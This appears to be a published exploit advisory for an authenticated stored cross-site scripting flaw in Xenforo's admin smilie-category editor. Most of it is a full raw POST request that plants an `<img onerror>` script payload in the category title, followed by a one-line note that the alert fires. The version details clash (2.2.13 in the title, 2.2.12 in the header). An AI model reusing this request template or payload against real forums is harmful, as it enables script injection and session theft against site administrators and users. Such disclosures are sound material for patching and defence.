Headline
Xenforo 2.2.13 Cross Site Scripting
Xenforo version 2.2.13 suffers from a persistent cross site scripting vulnerability.
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS# Date: 2023-06-24# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: https://x.com/admin.php?smilies# Version: 2.2.12 (REQUIRED)# Tested on: Windows/Linux# CVE : -----------------------------------------------------------------------------RequestsPOST /admin.php?smilie-categories/0/save HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/admin.php?smilies/X-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422Content-Length: 1038Origin: http://127.0.0.1Connection: closeCookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfToken"1687616851,83fd2350307156281e51b17e20fe575b-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="title"<img src=x onerror=alert(document.domain)>-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="display_order"1-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfRequestUri"/admin.php?smilies/-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfWithData"1-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfToken"1687616849,b74724a115448b864ba2db8f89f415f5-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfResponseType"json-----------------------------333176689514537912041638543422--Response: After it is created, an alert comes immediately.